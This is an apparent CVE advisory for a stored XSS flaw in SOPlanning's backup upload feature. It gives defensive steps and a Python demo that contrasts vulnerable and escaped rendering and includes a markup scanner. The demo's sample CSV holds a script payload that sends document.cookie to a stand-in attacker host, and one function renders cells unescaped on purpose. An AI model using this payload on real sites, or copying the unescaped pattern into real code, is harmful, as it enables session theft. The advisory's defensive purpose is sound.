PatchSiren

PatchSiren cyber security CVE debrief

CVE-2026-40544 SOPlanning CVE debrief

An authenticated stored cross-site scripting (XSS) vulnerability exists in SOPlanning versions 1.55 and below. The attack vector is the /process/upload_backup endpoint: an authenticated attacker with access to the backup functionality uploads a crafted ZIP archive whose user.csv file carries embedded JavaScript. The injected code executes in a victim's browser when that user clicks the Edit button for the malicious backup. The CVSS 4.0 vector indicates network attack vector, low attack complexity, no attack prerequisites, low privileges required, and user interaction required, with low confidentiality and integrity impact on both the vulnerable system and subsequent systems. The vulnerability is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation). Vendor attribution rests on reference-domain candidate evidence pointing to Soplanning, with low confidence, and needs review. No exploitation in ransomware campaigns has been reported, and the vulnerability is not listed in CISA KEV.

Vendor
SOPlanning
Product
Unknown
CVSS
MEDIUM 5.1
CISA KEV
Not listed in stored evidence
Original CVE published
2026-06-01
Original CVE updated
2026-06-01
Advisory published
2026-06-01
Advisory updated
2026-06-01

Who should care

SOPlanning administrators and anyone who manages its backups, security teams tracking web application vulnerabilities, and organizations that run SOPlanning for project planning and need to assess their exposure to authenticated XSS through the backup feature.

Technical summary

The /process/upload_backup endpoint in SOPlanning 1.55 and below does not sanitize or encode the user.csv contents extracted from an uploaded ZIP backup archive. An authenticated attacker can embed JavaScript payloads in the CSV fields. When a victim later clicks the Edit button for the malicious backup entry, the CSV data is written into the page without output encoding, so the injected script runs in that user's browser session. The vulnerability requires low-privileged authenticated access to the backup functionality on the attacker's side and user interaction on the victim's side. Because the payload is stored in the backup, it remains live until the backup is removed, and it fires for whichever user opens the Edit view, which in practice is likely to be an administrator.

Defensive priority

medium

Recommended defensive actions

  • Restrict access to the backup upload functionality to a small set of highly trusted administrative accounts until a fix is applied.
  • Implement strict input validation and output encoding for data extracted from uploaded backup archives, particularly CSV file contents: reject archive members with unexpected names or paths, bound the extracted size, and HTML-escape every field before rendering.
  • Apply Content Security Policy (CSP) headers to limit the impact of any injected script. Start in report-only mode; a policy that blocks inline scripts may break existing application pages and will need nonces or hashes for legitimate inline code.
  • Upgrade to a patched version of SOPlanning when available from the vendor.
  • Monitor for suspicious ZIP archive uploads to the /process/upload_backup endpoint, especially those containing user.csv files with markup, script tags, or event-handler attributes in field values.
  • Review and sanitize any existing backups that may have been uploaded from untrusted sources, since a stored payload persists until the backup is removed.
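The pattern the technical summary and the actions above describe, as an added example that is not SOPlanning's code (SOPlanning is written in PHP; the pattern is shown here in Python because it is language-neutral). The archive layout (a top-level user.csv with name, email and role columns), the size bound, the field allowlist and all sample rows are constructed assumptions for the demonstration. The block builds a backup ZIP carrying a script payload, renders it both the vulnerable way and the hardened way, and runs a simple markup scan of the kind a team could use when reviewing already-uploaded backups:

```python
"""Stored XSS via a CSV inside an uploaded backup ZIP: vulnerable vs hardened.

Added example, not SOPlanning code. Archive layout, column names, limits and
sample rows are assumptions used only to demonstrate the advisory's pattern.
"""
import csv
import html
import io
import re
import zipfile

# Constructed sample rows; the third row carries a payload in the email column.
SAMPLE_ROWS = [
    ["name", "email", "role"],
    ["alice", "alice@example.test", "admin"],
    ["mallory", "<script>fetch('https://attacker.invalid/?c='+document.cookie)</script>", "user"],
]

MAX_CSV_BYTES = 1_000_000  # assumption: upper bound for an extracted user.csv
SAFE_CELL = re.compile(r"^[\w .@'+-]{0,128}$")  # assumption: allowlist for backup fields
MARKUP = re.compile(r"<[a-zA-Z/!?]|javascript:|on\w+\s*=", re.IGNORECASE)


def build_backup_zip(rows, extra_members=None):
    """Build an in-memory backup archive containing user.csv (plus optional extra members)."""
    out = io.StringIO()
    csv.writer(out).writerows(rows)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("user.csv", out.getvalue())
        for name, data in (extra_members or {}).items():
            zf.writestr(name, data)
    return buf.getvalue()


def _read_user_csv(zip_bytes):
    """Extract only a top-level user.csv; reject traversal paths and oversize members."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = zf.namelist()
        if "user.csv" not in names:
            raise ValueError("user.csv missing from backup")
        for name in names:
            if name.startswith("/") or ".." in name.split("/"):
                raise ValueError(f"refusing archive member with unsafe path: {name!r}")
        if zf.getinfo("user.csv").file_size > MAX_CSV_BYTES:
            raise ValueError("user.csv exceeds size limit")
        text = zf.read("user.csv").decode("utf-8", errors="strict")
    return list(csv.reader(io.StringIO(text)))


def render_backup_edit_vulnerable(zip_bytes):
    """Vulnerable pattern: CSV cells are concatenated straight into the Edit page."""
    rows = _read_user_csv(zip_bytes)
    body = "".join("<tr>" + "".join(f"<td>{c}</td>" for c in r) + "</tr>" for r in rows)
    return f"<table>{body}</table>"


def render_backup_edit_hardened(zip_bytes):
    """Hardened pattern: every cell is HTML-escaped before it reaches the page."""
    rows = _read_user_csv(zip_bytes)
    body = "".join(
        "<tr>" + "".join(f"<td>{html.escape(c, quote=True)}</td>" for c in r) + "</tr>"
        for r in rows
    )
    return f"<table>{body}</table>"


def scan_backup_for_markup(zip_bytes):
    """Detection aid: return (row, column, cell) for cells that look like markup
    or fail the field allowlist. Intended for reviewing already-uploaded backups."""
    findings = []
    for r_idx, row in enumerate(_read_user_csv(zip_bytes)):
        for c_idx, cell in enumerate(row):
            if MARKUP.search(cell) or not SAFE_CELL.match(cell):
                findings.append((r_idx, c_idx, cell))
    return findings


if __name__ == "__main__":
    archive = build_backup_zip(SAMPLE_ROWS)
    print(render_backup_edit_vulnerable(archive))   # payload lands in the page verbatim
    print(render_backup_edit_hardened(archive))     # payload is rendered as inert text
    for row, col, cell in scan_backup_for_markup(archive):
        print(f"suspicious cell at row {row} col {col}: {cell[:60]}")
```

The escaping belongs at the point where a field is written into HTML, not at upload time: a backup stored "clean" can still be rendered unsafely by another code path, and escaping on input corrupts legitimate values such as names containing an apostrophe. The archive checks (member names, path traversal, size) are separate from the XSS fix but are the validation a backup importer needs anyway.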

Evidence notes

Vulnerability description sourced from official CVE record and NVD entry. CVSS 4.0 vector and CWE-79 classification provided by [email protected] via NVD references. Vendor attribution derived from reference domain candidate 'Soplanning' with low confidence flag. Affected version range (1.55 and below) stated in CVE description. Attack requires authenticated access to backup functionality.
